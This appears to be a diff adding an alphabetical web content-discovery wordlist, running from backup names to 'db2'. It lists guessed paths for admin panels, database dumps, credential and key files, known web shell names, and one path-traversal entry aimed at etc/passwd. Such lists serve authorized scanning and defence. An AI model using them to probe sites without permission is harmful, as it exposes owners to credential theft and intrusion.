+2013.sql
+2013.tar
+2013.tar.bz2
+2013.tar.gz
+2013.tgz
+2013.zip
+2014.sql
+2014.tar
+2014.tar.bz2
+2014.tar.gz
+2014.tgz
+2014.zip
+2015.sql
+2015.tar
+2015.tar.bz2
+2015.tar.gz
+2015.tgz
+2015.zip
+2016.sql
+2016.tar
+2016.tar.bz2
+2016.tar.gz
+2016.tgz
+2016.zip
+2017.sql
+2017.tar
+2017.tar.bz2
+2017.tar.gz
+2017.tgz
+2017.zip
+2018.sql
+2018.tar
+2018.tar.bz2
+2018.tar.gz
+2018.tgz
+2018.zip
+2019.sql
+2019.tar
+2019.tar.bz2
+2019.tar.gz
+2019.tgz
+2019.zip
+2020.sql
+2020.tar
+2020.tar.bz2
+2020.tar.gz
+2020.tgz
+2020.zip
+2021.sql
+2021.tar
+2021.tar.bz2
+2021.tar.gz
+2021.tgz
+2021.zip
+2022-backup.zip
+2022.sql
+2022.tar
+2022.tar.bz2
+2022.tar.gz
+2022.tgz
+2022.zip
+2023-backup.zip
+2023.sql
+2023.tar
+2023.tar.bz2
+2023.tar.gz
+2023.tgz
+2023.zip
+2024-backup.zip
+2024.sql
+2024.tar
+2024.tar.bz2
+2024.tar.gz
+2024.tgz
+2024.zip
+2phpmyadmin/
+3.php
+4.php
+5.php
+6.php
+7.php
+7788.php
+8.php
+8899.php
+9.php
+9678.php
+\..\..\..\..\..\..\..\..\..\etc\passwd
+_.htpasswd
+__admin
+__bx_log.log
+__cache/
+__dummy.html
+__history/
+__index.php
+__init__.py
+__MACOSX
+__main__.py
+__php_errors.log
+__pma___
+__pycache__/
+__recovery/
+__SQL
+__test.php
+__web_console/
+_adm
+_admin
+_book
+_build
+_build/
+_cache/
+_common.xsl
+_config.inc
+_data/
+_data/error_log
+_debugbar/open
+_Dockerfile
+_errors
+_eumm/
+_files
+_fragment
+_h5ai/
+_include
+_index.php
+_install
+_internal
+_layouts
+_layouts/
+_layouts/alllibs.htm
+_layouts/settings.htm
+_layouts/userinfo.htm
+_log/
+_log/access-log
+_log/access.log
+_log/access_log
+_log/error-log
+_log/error.log
+_log/error_log
+_logs
+_logs/
+_logs/access-log
+_logs/access.log
+_logs/access_log
+_logs/err.log
+_logs/error-log
+_logs/error.log
+_logs/error_log
+_LPHPMYADMIN/
+_mmServerScripts/
+_mmServerScripts/MMHTTPDB.asp
+_mmServerScripts/MMHTTPDB.php
+_notes/
+_notes/dwsync.xml
+_novo/
+_novo/composer.lock
+_old
+_pages
+_php_errors.log
+_phpmyadmin/
+_pkginfo.txt
+_private
+_proxy
+_Pvt_Extensions
+_site/
+_source
+_SQL
+_sqladm
+_src
+_TeamCity
+_test
+_thumbs/
+_tracks
+_UpgradeReport_Files/
+_vti_bin/
+_vti_bin/_vti_adm/admin.dll
+_vti_bin/_vti_aut/author.dll
+_vti_bin/shtml.dll
+_vti_pvt/
+_vti_pvt/service.pwt
+_vti_pvt/users.pwt
+_WEB_INF/
+_wl_cls_gen.jar
+_wpeprivate
+_wpeprivate/
+_wpeprivate/config.json
+_www
+_yardoc/
+a%5c.aspx
+a.out
+aadmin/
+abs/
+acceptance_config.yml
+acceso
+acceso.php
+access
+access-log
+access-log.1
+access.1
+access.log
+access.php
+access.txt
+access/
+access_.log
+access_log
+access_log.1
+accesslog
+account.html
+account.php
+accounts
+accounts.php
+accounts.sql
+accounts.txt
+accounts.xml
+accounts/
+acct_login/
+activemq/
+activity.log
+actuator
+actuator/dump
+actuator/env
+actuator/logfile
+actuator/mappings
+actuator/trace
+ad_login
+ad_manage
+add.php
+add_admin
+adfs/services/trust/2005/windowstransport
+adm
+adm.html
+adm.php
+adm/
+adm/admloginuser.php
+adm/index.html
+adm/index.php
+adm_auth
+adm_auth.php
+admin
+admin%20/
+admin-authz.xml
+admin-console
+admin-console/
+admin-database
+admin-database.php
+admin-database/
+admin-dev/
+admin-dev/autoupgrade/
+admin-dev/backups/
+admin-dev/export/
+admin-dev/import/
+admin-login
+admin-login.html
+admin-login.php
+admin-serv/
+admin-serv/config/admpw
+admin.asp
+admin.aspx
+admin.cfm
+admin.cgi
+admin.conf
+admin.conf.default
+admin.dat
+admin.do
+admin.htm
+admin.htm.php
+admin.html
+admin.html.php
+admin.jsp
+admin.mdb
+admin.passwd
+admin.php
+admin.php3
+admin.pl
+admin/
+admin/.config
+admin/.htaccess
+admin/_logs/access-log
+admin/_logs/access.log
+admin/_logs/access_log
+admin/_logs/err.log
+admin/_logs/error-log
+admin/_logs/error.log
+admin/_logs/error_log
+admin/_logs/login.txt
+admin/access.log
+admin/access.txt
+admin/access_log
+admin/account
+admin/account.html
+admin/account.php
+admin/admin
+admin/admin-login
+admin/admin-login.html
+admin/admin-login.php
+admin/admin.html
+admin/admin.php
+admin/admin_login
+admin/admin_login.html
+admin/admin_login.php
+admin/adminLogin
+admin/adminLogin.htm
+admin/adminLogin.html
+admin/adminLogin.php
+admin/backup/
+admin/backups/
+admin/config.php
+admin/controlpanel
+admin/controlpanel.htm
+admin/controlpanel.html
+admin/controlpanel.php
+admin/cp
+admin/cp.html
+admin/cp.php
+admin/db/
+admin/default
+admin/default.asp
+admin/default/admin.asp
+admin/default/login.asp
+admin/download.php
+admin/dumper/
+admin/error.log
+admin/error.txt
+admin/error_log
+admin/export.php
+admin/FCKeditor
+admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
+admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
+admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
+admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
+admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
+admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
+admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
+admin/fckeditor/editor/filemanager/connectors/php/connector.php
+admin/fckeditor/editor/filemanager/connectors/php/upload.php
+admin/fckeditor/editor/filemanager/upload/asp/upload.asp
+admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
+admin/fckeditor/editor/filemanager/upload/php/upload.php
+admin/file.php
+admin/files.php
+admin/home
+admin/home.html
+admin/home.php
+admin/includes/configure.php~
+admin/index
+admin/index.asp
+admin/index.html
+admin/index.php
+admin/js/tiny_mce/
+admin/js/tinymce/
+admin/log
+admin/login
+admin/login.asp
+admin/login.htm
+admin/login.html
+admin/login.php
+admin/logon.jsp
+admin/logs/
+admin/logs/access-log
+admin/logs/access.log
+admin/logs/access_log
+admin/logs/err.log
+admin/logs/error-log
+admin/logs/error.log
+admin/logs/error_log
+admin/logs/login.txt
+admin/manage
+admin/manage.asp
+admin/manage/admin.asp
+admin/manage/login.asp
+admin/mysql/
+admin/mysql/index.php
+admin/mysql2/index.php
+admin/phpMyAdmin
+admin/phpMyAdmin/
+admin/phpmyadmin/
+admin/phpMyAdmin/index.php
+admin/phpmyadmin/index.php
+admin/phpmyadmin2/index.php
+admin/pMA/
+admin/pma/
+admin/PMA/index.php
+admin/pma/index.php
+admin/pol_log.txt
+admin/private/logs
+admin/secure/logon.jsp
+admin/sqladmin/
+admin/sxd/
+admin/sysadmin/
+admin/upload.php
+admin/uploads.php
+admin/user_count.txt
+admin/web/
+admin0
+admin1
+admin1.htm
+admin1.html
+admin1.php
+admin1/
+admin2
+admin2.asp
+admin2.html
+admin2.old/
+admin2.php
+admin2/
+admin2/index.php
+admin2/login.php
+admin3/
+admin4/
+admin4_account/
+admin4_colon/
+admin5/
+admin_
+admin_/
+admin_admin
+admin_area
+admin_area.php
+admin_area/
+admin_area/admin
+admin_area/admin.html
+admin_area/admin.php
+admin_area/index.html
+admin_area/index.php
+admin_area/login
+admin_area/login.html
+admin_area/login.php
+admin_files
+admin_index
+admin_index.asp
+admin_login
+admin_login.html
+admin_login.php
+admin_login/
+admin_login/admin.asp
+admin_login/login.asp
+admin_logon
+admin_logon/
+admin_main
+admin_pass
+admin_tools/
+adminarea/
+adminarea/admin.html
+adminarea/admin.php
+adminarea/index.html
+adminarea/index.php
+adminarea/login.html
+adminarea/login.php
+adminconsole
+admincontrol
+admincontrol.html
+admincontrol.php
+admincontrol/
+admincontrol/login.html
+admincontrol/login.php
+admincp/
+admincp/index.asp
+admincp/index.html
+admincp/js/kindeditor/
+admincp/login
+admincp/login.asp
+admincp/upload/
+adminedit
+adminer-4.0.0-en.php
+adminer-4.0.0-mysql-en.php
+adminer-4.0.0-mysql.php
+adminer-4.0.0.php
+adminer-4.0.1-en.php
+adminer-4.0.1-mysql-en.php
+adminer-4.0.1-mysql.php
+adminer-4.0.1.php
+adminer-4.0.2-en.php
+adminer-4.0.2-mysql-en.php
+adminer-4.0.2-mysql.php
+adminer-4.0.2.php
+adminer-4.0.3-en.php
+adminer-4.0.3-mysql-en.php
+adminer-4.0.3-mysql.php
+adminer-4.0.3.php
+adminer-4.1.0-en.php
+adminer-4.1.0-mysql-en.php
+adminer-4.1.0-mysql.php
+adminer-4.1.0.php
+adminer-4.2.0-en.php
+adminer-4.2.0-mysql-en.php
+adminer-4.2.0-mysql.php
+adminer-4.2.0.php
+adminer-4.2.1-en.php
+adminer-4.2.1-mysql-en.php
+adminer-4.2.1-mysql.php
+adminer-4.2.1.php
+adminer-4.2.2-en.php
+adminer-4.2.2-mysql-en.php
+adminer-4.2.2-mysql.php
+adminer-4.2.2.php
+adminer-4.2.3-en.php
+adminer-4.2.3-mysql-en.php
+adminer-4.2.3-mysql.php
+adminer-4.2.3.php
+adminer-4.2.4-en.php
+adminer-4.2.4-mysql-en.php
+adminer-4.2.4-mysql.php
+adminer-4.2.4.php
+adminer-4.2.5-en.php
+adminer-4.2.5-mysql-en.php
+adminer-4.2.5-mysql.php
+adminer-4.2.5.php
+adminer-4.3.0-en.php
+adminer-4.3.0-mysql-en.php
+adminer-4.3.0-mysql.php
+adminer-4.3.0.php
+adminer-4.3.1-en.php
+adminer-4.3.1-mysql-en.php
+adminer-4.3.1-mysql.php
+adminer-4.3.1.php
+adminer-4.4.0-en.php
+adminer-4.4.0-mysql-en.php
+adminer-4.4.0-mysql.php
+adminer-4.4.0.php
+adminer-4.5.0-en.php
+adminer-4.5.0-mysql-en.php
+adminer-4.5.0-mysql.php
+adminer-4.5.0.php
+adminer-4.6.0-en.php
+adminer-4.6.0-mysql-en.php
+adminer-4.6.0-mysql.php
+adminer-4.6.0.php
+adminer-4.6.1-en.php
+adminer-4.6.1-mysql-en.php
+adminer-4.6.1-mysql.php
+adminer-4.6.1.php
+adminer-4.6.2-en.php
+adminer-4.6.2-mysql-en.php
+adminer-4.6.2-mysql.php
+adminer-4.6.2.php
+adminer-4.6.3-en.php
+adminer-4.6.3-mysql-en.php
+adminer-4.6.3-mysql.php
+adminer-4.6.3.php
+adminer-4.7.0-en.php
+adminer-4.7.0-mysql-en.php
+adminer-4.7.0-mysql.php
+adminer-4.7.0.php
+adminer-4.7.1-en.php
+adminer-4.7.1-mysql-en.php
+adminer-4.7.1-mysql.php
+adminer-4.7.1.php
+adminer-4.7.2-en.php
+adminer-4.7.2-mysql-en.php
+adminer-4.7.2-mysql.php
+adminer-4.7.2.php
+adminer-4.7.3-en.php
+adminer-4.7.3-mysql-en.php
+adminer-4.7.3-mysql.php
+adminer-4.7.3.php
+adminer-4.7.4-en.php
+adminer-4.7.4-mysql-en.php
+adminer-4.7.4-mysql.php
+adminer-4.7.4.php
+adminer-4.7.5-en.php
+adminer-4.7.5-mysql-en.php
+adminer-4.7.5-mysql.php
+adminer-4.7.5.php
+adminer-4.7.6-en.php
+adminer-4.7.6-mysql-en.php
+adminer-4.7.6-mysql.php
+adminer-4.7.6.php
+adminer-4.7.7-en.php
+adminer-4.7.7-mysql-en.php
+adminer-4.7.7-mysql.php
+adminer-4.7.7.php
+adminer-4.7.8-en.php
+adminer-4.7.8-mysql-en.php
+adminer-4.7.8-mysql.php
+adminer-4.7.8.php
+adminer-4.7.9-en.php
+adminer-4.7.9-mysql-en.php
+adminer-4.7.9-mysql.php
+adminer-4.7.9.php
+adminer-4.8.0-en.php
+adminer-4.8.0-mysql-en.php
+adminer-4.8.0-mysql.php
+adminer-4.8.0.php
+adminer-4.8.1-en.php
+adminer-4.8.1-mysql-en.php
+adminer-4.8.1-mysql.php
+adminer-4.8.1.php
+adminer.php
+adminer/
+adminer/adminer.php
+adminer_coverage.ser
+adminis.php
+administer/
+administr8
+administr8.php
+administr8/
+administracao.php
+administracion.php
+administracion/
+administrador/
+administrateur.php
+administrateur/
+administratie/
+administration
+administration.php
+administration/
+administration/Sym.php
+administrative/
+administrative/login_history
+administrator
+administrator-login/
+administrator.html
+administrator.php
+administrator/
+administrator/.htaccess
+administrator/account
+administrator/account.html
+administrator/account.php
+administrator/admin.asp
+administrator/admin/
+administrator/cache/
+administrator/db/
+administrator/includes/
+administrator/index.html
+administrator/index.php
+administrator/login
+administrator/login.asp
+administrator/login.html
+administrator/login.php
+administrator/logs
+administrator/logs/
+administrator/phpMyAdmin/
+administrator/phpmyadmin/
+administrator/PMA/
+administrator/pma/
+administrator/web/
+administratoraccounts/
+administratorlogin
+administratorlogin.php
+administratorlogin/
+administrators
+administrators.php
+administrators.pwd
+administrators/
+administrivia/
+adminitem
+adminitem/
+adminitems
+adminitems.php
+adminitems/
+adminlogin
+adminLogin.html
+adminLogin.php
+adminlogin.php
+adminLogin/
+adminlogon/
+adminpanel
+adminpanel.html
+adminpanel.php
+adminpanel/
+adminpro/
+admins
+admins.asp
+admins.php
+admins/
+admins/backup/
+admins/log.txt
+adminsite/
+AdminTools/
+adminuser
+admission_controller_config.yaml
+admloginuser.php
+admpar/
+admpar/.ftppass
+admrev/
+admrev/.ftppass
+admrev/_files/
+affiliate
+affiliate.php
+affiliates.sql
+ak47.php
+akeeba.backend.log
+all/
+all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf
+amad.php
+amministratore.php
+analog.html
+anchor/errors.log
+ansible/
+answers/
+answers/error_log
+apache/
+apache/logs/access.log
+apache/logs/access_log
+apache/logs/error.log
+apache/logs/error_log
+apc-nrp.php
+apc.php
+apc/
+apc/apc.php
+apc/index.php
+api
+api-doc
+api-docs
+api.log
+api.php
+api.tar.gz
+api.tgz
+api.py
+api.zip
+api/
+api/2/explore/
+api/error_log
+api/graphiql
+api/graphql
+api/jsonws
+api/login.json
+api/package_search/v4/documentation
+api/swagger
+api/swagger-ui.html
+api/swagger.yml
+api/v1
+api/v1/graphiql
+api/v1/graphql
+api/v1/playground
+api/v2
+api/v2/graphiql
+api/v2/graphql
+api/v2/playground
+api/v3
+api/v3/graphiql
+api/v3/graphql
+api/v3/playground
+api_log.txt
+apibuild.pyc
+apidoc
+apidocs
+apiserver-aggregator-ca.cert
+apiserver-aggregator.cert
+apiserver-aggregator.key
+apiserver-client.crt
+apiserver-key.pem
+app-service.yaml
+app.config
+app.config.env
+app.env
+app.js
+app.php
+app.yaml
+app.zip
+app/
+app/.htaccess
+app/__pycache__/
+app/bin
+app/bootstrap.php.cache
+app/cache/
+app/composer.json
+app/composer.lock
+app/config/adminConf.json
+app/Config/core.php
+app/Config/database.php
+app/config/database.yml
+app/config/database.yml.pgsql
+app/config/database.yml.sqlite3
+app/config/database.yml_original
+app/config/database.yml~
+app/config/databases.yml
+app/config/global.json
+app/config/parameters.ini
+app/config/parameters.yml
+app/config/routes.cfg
+app/config/schema.yml
+app/dev
+app/docs
+app/etc/config.xml
+app/etc/enterprise.xml
+app/etc/fpc.xml
+app/etc/local.additional
+app/etc/local.xml
+app/etc/local.xml.additional
+app/etc/local.xml.bak
+app/etc/local.xml.live
+app/etc/local.xml.localRemote
+app/etc/local.xml.phpunit
+app/etc/local.xml.template
+app/etc/local.xml.vmachine
+app/etc/local.xml.vmachine.rm
+app/languages
+app/log/
+app/logs/
+app/phpunit.xml
+app/src
+app/storage/
+app/sys
+app/testing
+app/tmp/
+app/unschedule.bat
+app/vendor
+app/vendor-
+app/vendor-src
+app_dev.php
+appcache.manifest
+appengine-generated/
+applet
+application
+application.log
+application.wadl
+application/
+application/cache/
+application/configs/application.ini
+application/logs/
+apply.cgi
+AppPackages/
+apps/
+apps/__pycache__/
+apps/frontend/config/app.yml
+apps/frontend/config/databases.yml
+appveyor.yml
+Aptfile
+ar-lib
+archaius
+archaius.json
+archive.7z
+archive.rar
+archive.sql
+archive.tar
+archive.tar.gz
+archive.tgz
+archive.zip
+article/
+article/admin
+article/admin/admin.asp
+artifactory/
+artifacts/
+ASALocalRun/
+asd.php
+asp.aspx
+aspnet_client/
+aspnet_webadmin
+aspwpadmin
+aspxspy.aspx
+asset..
+assets/
+assets/fckeditor
+assets/js/fckeditor
+assets/npm-debug.log
+assets/pubspec.yaml
+asterisk.log
+asterisk/
+AT-admin.cgi
+atlassian-ide-plugin.xml
+audit.log
+auditevents
+auditevents.json
+auth
+auth.inc
+auth.php
+auth.tar.gz
+auth.zip
+auth_user_file.txt
+authadmin
+authadmin.php
+authadmin/
+authenticate
+authenticate.php
+authentication
+authentication.php
+authlog.txt
+authorization.config
+authorize.php
+authorized_keys
+authorizenet.log
+authuser
+authuser.php
+auto/
+autoconfig
+autoconfig.json
+autodiscover/
+autologin
+autologin.php
+autologin/
+autom4te.cache
+autoscan.log
+AutoTest.Net/
+autoupdate/
+av/
+aws/
+awstats
+awstats.conf
+awstats.pl
+awstats/
+axis/
+axis//happyaxis.jsp
+axis2-web//HappyAxis.jsp
+axis2/
+axis2//axis2-web/HappyAxis.jsp
+axis2/axis2-web/HappyAxis.jsp
+azure-pipelines.yml
+azureadmin/
+b2badmin/
+babel.config.js
+back.sql
+back_office.php
+backoffice.php
+backoffice/
+backoffice/v1/ui
+backup
+backup-2022.zip
+backup-2023.zip
+backup-2024.zip
+backup.7z
+backup.cfg
+backup.htpasswd
+backup.inc
+backup.inc.old
+backup.old
+backup.rar
+backup.sql
+backup.sql.old
+backup.tar
+backup.tar.bz2
+backup.tar.gz
+backup.tgz
+backup.zip
+Backup/
+backup/
+backup0/
+backup1/
+backup123/
+backup2/
+backup2022.zip
+backup2023.zip
+backup2024.zip
+backups
+backups.7z
+backups.inc
+backups.inc.old
+backups.old
+backups.rar
+backups.sql
+backups.sql.old
+backups.tar
+backups.tar.bz2
+backups.tar.gz
+backups.tgz
+backups.zip
+backups/
+bak/
+bamb/
+bamboo/
+banner.swf
+banneradmin/
+base/
+basic_auth.csv
+bb-admin/
+bb-admin/admin
+bb-admin/admin.html
+bb-admin/admin.php
+bb-admin/index.html
+bb-admin/index.php
+bb-admin/login
+bb-admin/login.html
+bb-admin/login.php
+bbadmin/
+bbs/
+bbs/admin/login
+bbs/admin_index.asp
+bea_wls_cluster_internal/
+bea_wls_deployment_internal/
+bea_wls_deployment_internal/DeploymentService
+bea_wls_diagnostics/
+bea_wls_internal/
+beans
+beans.json
+behat.yml
+BenchmarkDotNet.Artifacts/
+Berksfile
+beta
+beta.zip
+bigadmin/
+bigdump.php
+billing
+billing/
+billing/killer.php
+bin-debug/
+bin-release/
+bin/
+bin/config.sh
+bin/hostname
+bin/libs
+bin/reset-db-prod.sh
+bin/reset-db.sh
+bin/RhoBundle
+bin/target
+bin/tmp
+Binaries/
+bitbucket-pipelines.yml
+bitrix/
+bitrix/.settings
+bitrix/.settings.bak
+bitrix/.settings.php
+bitrix/.settings.php.bak
+bitrix/admin/help.php
+bitrix/admin/index.php
+bitrix/admin/site_checker.php
+bitrix/authorization.config
+bitrix/backup/
+bitrix/cache
+bitrix/cache_image
+bitrix/components/bitrix/desktop/admin_settings.php
+bitrix/components/bitrix/map.yandex.search/settings/settings.php
+bitrix/components/bitrix/player/player_playlist_edit.php
+bitrix/components/bitrix/sender.mail.editor/ajax.php
+bitrix/dumper/
+bitrix/error.log
+bitrix/import/
+bitrix/import/files
+bitrix/import/import
+bitrix/import/m_import
+bitrix/license_key.php
+bitrix/logs/
+bitrix/managed_cache
+bitrix/modules
+bitrix/modules/error.log
+bitrix/modules/error.log.old
+bitrix/modules/main/admin/restore.php
+bitrix/modules/main/classes/mysql/agent.php
+bitrix/modules/main/include/virtual_file_system.php
+bitrix/modules/serverfilelog-0.dat
+bitrix/modules/serverfilelog-1.dat
+bitrix/modules/serverfilelog_tmp.dat
+bitrix/modules/smtpd.log
+bitrix/modules/updater.log
+bitrix/modules/updater_partner.log
+bitrix/otp/
+bitrix/php_interface/dbconn.php
+bitrix/php_interface/dbconn.php2
+bitrix/settings
+bitrix/settings.bak
+bitrix/settings.php
+bitrix/settings.php.bak
+bitrix/stack_cache
+bitrix/tools/autosave.php
+bitrix/tools/get_catalog_menu.php
+bitrix/tools/html_editor_action.php
+bitrix/tools/mail_entry.php
+bitrix/tools/upload.php
+bitrix/tools/vote/uf.php
+bitrix/web.config
+bitrix_server_test.log
+bitrix_server_test.php
+bitrixsetup.php
+biy/
+biy/upload/
+Black.php
+blacklist.dat
+bld/
+blib/
+blockchain.json
+blog/
+blog/error_log
+blog/wp-content/backup-db/
+blog/wp-content/backups/
+blog/wp-login
+blog/wp-login.php
+blogindex/
+bookContent.swf
+boot.php
+bootstrap/data
+bootstrap/tmp
+bot.txt
+bower.json
+bower_components
+bower_components/
+box.json
+Brocfile.coffee
+Brocfile.js
+browser/
+brunch-config.coffee
+brunch-config.js
+bsmdashboards/messagebroker/amfsecure
+buck.sql
+buffer.conf
+bugs
+Build
+build
+build-iPhoneOS/
+build-iPhoneSimulator/
+Build.bat
+build.local.xml
+build.log
+build.properties
+build.sh
+build.xml
+build/
+build/build.properties
+build/buildinfo.properties
+build/reference/web-api/explore
+build/Release
+build_config_private.ini
+build_isolated/
+buildNumber.properties
+BundleArtifacts/
+bx_1c_import.php
+c-h.v2.php
+c100.php
+c22.php
+c99.php
+c99shell.php
+ca.crt
+ca.kru
+cabal-dev
+cabal.project.local
+cabal.project.local~
+cabal.sandbox.config
+cache
+cache-downloads
+cache/
+cache/sql_error_latest.cgi
+cachemgr.cgi
+caches
+cadmins/
+Cakefile
+Capfile
+capistrano/
+captures/
+Cargo.lock
+Carthage/Build
+cassandra/
+catalog.wci
+CATKIN_IGNORE
+cbx-portal/
+cbx-portal/js/zeroclipboard/ZeroClipboard.swf
+cc-errors.txt
+cc-log.txt
+ccbill.log
+ccp14admin/
+celerybeat-schedule
+cell.xml
+centreon/
+cert/
+certenroll/
+certprov/
+certsrv/
+cfexec.cfm
+cfg/
+cfg/cpp/
+CFIDE/
+CFIDE/administrator/
+cgi-bin/
+cgi-bin/awstats.pl
+cgi-bin/logi.php
+cgi-bin/login
+cgi-bin/login.cgi
+cgi-bin/php.ini
+cgi-bin/printenv.pl
+cgi-bin/test-cgi
+cgi-bin/test.cgi
+cgi-bin/ViewLog.asp
+cgi-sys/
+cgi-sys/realsignup.cgi
+cgi.pl/
+cgi/
+cgi/common.cg
+cgi/common.cgi
+Cgishell.pl
+change.log
+changeall.php
+CHANGELOG
+ChangeLog
+Changelog
+changelog
+CHANGELOG.HTML
+CHANGELOG.html
+ChangeLog.html
+Changelog.html
+changelog.html
+CHANGELOG.MD
+CHANGELOG.md
+ChangeLog.md
+Changelog.md
+changelog.md
+CHANGELOG.TXT
+CHANGELOG.txt
+ChangeLog.txt
+Changelog.txt
+changelog.txt
+CHANGES.html
+CHANGES.md
+changes.txt
+check
+check.php
+checkadmin
+checkadmin.php
+checked_accounts.txt
+checklogin
+checklogin.php
+checkouts/
+checkstyle/
+checkuser
+checkuser.php
+chef/
+Cheffile
+chefignore
+chkadmin
+chklogin
+chubb.xml
+ci/
+cidr.txt
+circle.yml
+Citrix/
+citrix/
+Citrix/PNAgent/config.xml
+citydesk.xml
+ckeditor
+ckeditor/
+ckeditor/ckfinder/ckfinder.html
+ckeditor/ckfinder/core/connector/asp/connector.asp
+ckeditor/ckfinder/core/connector/aspx/connector.aspx
+ckeditor/ckfinder/core/connector/php/connector.php
+ckfinder/
+ckfinder/ckfinder.html
+claroline/phpMyAdmin/index.php
+classes/
+classes/cookie.txt
+classes_gen
+classic.json
+classic.jsonp
+cleanup.log
+cli/
+client.ovpn
+client_.ovpn
+client_secret.json
+client_secrets.json
+ClientAccessPolicy.xml
+ClientBin/
+cliente/
+cliente/downloads/h4xor.php
+clients.mdb
+clients.sql
+clients.sqlite
+clients.tar.gz
+clients.zip
+cloud-config.yml
+cloud/
+cmake_install.cmake
+CMakeCache.txt
+CMakeFiles
+CMakeLists.txt
+CMakeLists.txt.user
+CMakeScripts
+cmd-asp-5.1.asp
+cmdasp.asp
+cmdasp.aspx
+cmdjsp.jsp
+cms-admin
+cms.csproj
+cms/
+cms/cms.csproj
+cms/Web.config
+cmsadmin
+cmsadmin.php
+cmsadmin/
+cmscockpit/
+cni-conf.json
+code.zip
+codeception.yml
+codeship/
+collectd/
+collectl/
+com.tar.gz
+com.zip
+command.php
+common.inc
+common.xml
+common/
+common/config/api.ini
+common/config/db.ini
+compass.rb
+compile
+compile_commands.json
+components/
+composer-bx.json
+composer.json
+composer.lock
+composer.phar
+composer/installed.json
+conditions
+conf
+conf/
+conf/Catalina
+conf/catalina.policy
+conf/catalina.properties
+conf/context.xml
+conf/logging.properties
+conf/server.xml
+conf/tomcat-users.xml
+conf/tomcat8.conf
+conf/web.xml
+config
+config.bak
+config.codekit
+config.codekit3
+config.core
+config.dat
+config.env
+config.guess
+config.h.in
+config.hash
+config.inc
+config.inc.bak
+config.inc.old
+config.inc.php
+config.inc.php.txt
+config.inc.php~
+config.inc.txt
+config.inc~
+config.ini
+config.ini.bak
+config.ini.old
+config.ini.txt
+config.json
+config.json.cfm
+config.local
+config.local.php_old
+config.local.php~
+config.old
+config.php
+config.php-eb
+config.php.bak
+config.php.bkp
+config.php.dist
+config.php.inc
+config.php.inc~
+config.php.new
+config.php.old
+config.php.save
+config.php.swp
+config.php.txt
+config.php.zip
+config.php~
+config.rb
+config.ru
+config.source
+config.sub
+config.txt
+config.xml
+config.yml
+config.zip
+Config/
+config/
+config/apc.php
+config/app.php
+config/app.yml
+config/AppData.config
+config/autoload/
+config/aws.yml
+config/banned_words.txt
+config/config.inc
+config/config.ini
+config/database.yml
+config/database.yml.pgsql
+config/database.yml.sqlite3
+config/database.yml_original
+config/database.yml~
+config/databases.yml
+config/db.inc
+config/development/
+config/initializers/secret_token.rb
+config/master.key
+config/monkcheckout.ini
+config/monkdonate.ini
+config/monkid.ini
+config/producao.ini
+config/routes.yml
+config/settings.inc
+config/settings.ini
+config/settings.ini.cfm
+config/settings.local.yml
+config/settings/production.yml
+config/site.php
+config/xml/
+config_override.php
+configprops
+configs.zip
+configs/
+Configs/authServerSettings.config
+configs/conf_bdd.ini
+configs/conf_zepass.ini
+Configs/Current/authServerSettings.config
+configuration.ini
+configuration.php
+configuration.php.bak
+configuration.php.dist
+configuration.php.old
+configuration.php.save
+configuration.php.swp
+configuration.php.txt
+configuration.php.zip
+configuration.php~
+configuration.zip
+configuration/
+configure
+configure.scan
+conflg.php
+confluence/
+conn.asp
+connect.inc
+connection.inc
+console
+console/
+console/base/config.json
+console/payments/config.json
+consul/
+content/
+content/debug.log
+CONTRIBUTING.md
+contributing.md
+contributors.txt
+control
+control.php
+control/
+controller.php
+controllers/
+controlpanel
+controlpanel.html
+controlpanel.php
+controlpanel/
+cookbooks
+cookie
+cookie.php
+COPYING
+COPYRIGHT.txt
+core.zip
+core/latest/swagger-ui/index.html
+count_admin
+cover
+cover_db/
+coverage
+coverage.data
+coverage.xml
+coverage/
+cp
+cp.html
+cp.php
+cp/
+cpanel
+Cpanel.php
+cpanel.php
+cpanel/
+cpanel_file/
+cpbackup-exclude.conf
+cpbt.php
+cpn.php
+craft/
+crash.log
+credentials
+credentials.csv
+credentials.json
+credentials.txt
+credentials.xml
+credentials/
+credentials/gcloud.json
+CREDITS
+crm/
+cron.log
+cron.php
+cron.sh
+cron/
+cron/cron.sh
+cron_import.log
+cron_sku.log
+crond/
+crond/logs/
+cronlog.txt
+cscockpit/
+csdp.cache
+csp/gateway/slc/api/swagger-ui.html
+css.php
+csx/
+CTestTestfile.cmake
+culeadora.txt
+custom/
+custom/db.ini
+customer_login/
+customers.csv
+customers.log
+customers.mdb
+customers.sql
+customers.sql.gz
+customers.sqlite
+customers.txt
+customers.xls
+CVS/
+cvs/
+CVS/Entries
+CVS/Root
+d.php
+d0main.php
+d0maine.php
+d0mains.php
+dam.php
+dat.tar.gz
+dat.zip
+data-nseries.tsv
+data.mdb
+data.sql
+data.sqlite
+data.tsv
+data.txt
+data/
+data/backups/
+data/cache/
+data/debug/
+data/DoctrineORMModule/cache/
+data/DoctrineORMModule/Proxy/
+data/files/
+data/logs/
+data/sessions/
+data/tmp/
+database
+database.csv
+database.inc
+database.log
+database.mdb
+database.php
+database.sql
+database.sqlite
+database.txt
+database.yml
+database.yml.pgsql
+database.yml.sqlite3
+database.yml_original
+database.yml~
+database.zip
+database/
+database/database/
+database/phpMyAdmin/
+database/phpmyadmin/
+database/phpMyAdmin2/
+database/phpmyadmin2/
+database_admin
+Database_Administration/
+Database_Backup/
+database_credentials.inc
+databases.yml
+databases.zip
+datadog/
+dataobject.ini
+davmail.log
+DB
+db
+db-admin
+db-admin/
+db-full.mysql
+db.csv
+db.inc
+db.ini
+db.log
+db.mdb
+Db.properties
+Db.script
+db.sql
+db.sqlite
+db.sqlite3
+db.xml
+db.yaml
+db.zip
+db/
+db/db-admin/
+db/dbadmin/
+db/dbweb/
+db/index.php
+db/main.mdb
+db/myadmin/
+db/phpMyAdmin-2/
+db/phpMyAdmin-3/
+db/phpMyAdmin/
+db/phpmyadmin/
+db/phpMyAdmin2/
+db/phpmyadmin2/
+db/phpMyAdmin3/
+db/phpmyadmin3/
+db/sql
+db/webadmin/
+db/webdb/
+db/websql/
+db1.mdb
+db1.sqlite
+db2
